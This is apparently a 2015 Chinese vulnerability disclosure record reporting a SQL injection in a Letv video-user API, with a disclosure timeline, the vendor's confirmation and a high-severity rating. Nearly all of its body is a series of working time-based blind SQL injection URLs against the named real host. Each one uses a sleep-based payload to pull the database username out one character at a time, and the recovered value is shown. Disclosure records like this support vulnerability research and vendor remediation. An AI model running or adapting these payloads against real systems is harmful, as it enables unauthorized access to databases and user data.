2015-12-05: 细节已通知厂商并且等待厂商处理中 2015-12-08: 厂商已经确认,细节仅向厂商公开 2015-12-18: 细节向核心白帽子及相关领域专家公开 2015-12-28: 细节向普通白帽子公开 2016-01-07: 细节向实习白帽子公开 2016-01-21: 细节向公众公开
乐视某接口注入
http://api.my.letv.com/video/user/userlist?_=1448981579501&callback=jquery171007844012673012912_1448981577354&userids=17971889,68772723,115214501,129658282
uservideo_r@1http://api.my.letv.com/video/user/userlist?_=1448981579501&callback=jquery171007844012673012912_1448981577354&userids=17971889,68772723,115214501,129658282 xor (case when (sysdate()=now() and ascii(mid(user()from(1)for(1)))=117) then sleep(3) else 0 end)http://api.my.letv.com/video/user/userlist?_=1448981579501&callback=jquery171007844012673012912_1448981577354&userids=17971889,68772723,115214501,129658282 xor (case when (sysdate()=now() and ascii(mid(user()from(2)for(1)))=115) then sleep(3) else 0 end)http://api.my.letv.com/video/user/userlist?_=1448981579501&callback=jquery171007844012673012912_1448981577354&userids=17971889,68772723,115214501,129658282 xor (case when (sysdate()=now() and ascii(mid(user()from(1)for(1)))=101) then sleep(3) else 0 end)http://api.my.letv.com/video/user/userlist?_=1448981579501&callback=jquery171007844012673012912_1448981577354&userids=17971889,68772723,115214501,129658282 xor (case when (sysdate()=now() and ascii(mid(user()from(4)for(1)))=114) then sleep(3) else 0 end)http://api.my.letv.com/video/user/userlist?_=1448981579501&callback=jquery171007844012673012912_1448981577354&userids=17971889,68772723,115214501,129658282 xor (case when (sysdate()=now() and ascii(mid(user()from(5)for(1)))=118) then sleep(3) else 0 end)http://api.my.letv.com/video/user/userlist?_=1448981579501&callback=jquery171007844012673012912_1448981577354&userids=17971889,68772723,115214501,129658282 xor (case when (sysdate()=now() and ascii(mid(user()from(6)for(1)))=105) then sleep(3) else 0 end)http://api.my.letv.com/video/user/userlist?_=1448981579501&callback=jquery171007844012673012912_1448981577354&userids=17971889,68772723,115214501,129658282 xor (case when (sysdate()=now() and ascii(mid(user()from(7)for(1)))=100) then sleep(3) else 0 end)http://api.my.letv.com/video/user/userlist?_=1448981579501&callback=jquery171007844012673012912_1448981577354&userids=17971889,68772723,115214501,129658282 xor (case when (sysdate()=now() and ascii(mid(user()from(8)for(1)))=101) then sleep(3) else 0 end)http://api.my.letv.com/video/user/userlist?_=1448981579501&callback=jquery171007844012673012912_1448981577354&userids=17971889,68772723,115214501,129658282 xor (case when (sysdate()=now() and ascii(mid(user()from(9)for(1)))=111) then sleep(3) else 0 end)http://api.my.letv.com/video/user/userlist?_=1448981579501&callback=jquery171007844012673012912_1448981577354&userids=17971889,68772723,115214501,129658282 xor (case when (sysdate()=now() and ascii(mid(user()from(10)for(1)))=95) then sleep(3) else 0 end)http://api.my.letv.com/video/user/userlist?_=1448981579501&callback=jquery171007844012673012912_1448981577354&userids=17971889,68772723,115214501,129658282 xor (case when (sysdate()=now() and ascii(mid(user()from(11)for(1)))=114) then sleep(3) else 0 end)http://api.my.letv.com/video/user/userlist?_=1448981579501&callback=jquery171007844012673012912_1448981577354&userids=17971889,68772723,115214501,129658282 xor (case when (sysdate()=now() and ascii(mid(user()from(12)for(1)))=64) then sleep(3) else 0 end)http://api.my.letv.com/video/user/userlist?_=1448981579501&callback=jquery171007844012673012912_1448981577354&userids=17971889,68772723,115214501,129658282 xor (case when (sysdate()=now() and ascii(mid(user()from(13)for(1)))=49) then sleep(3) else 0 end)
危害等级:高
漏洞Rank:10
确认时间:2015-12-08 09:43
感谢提交,已通知相关业务方处理
暂无
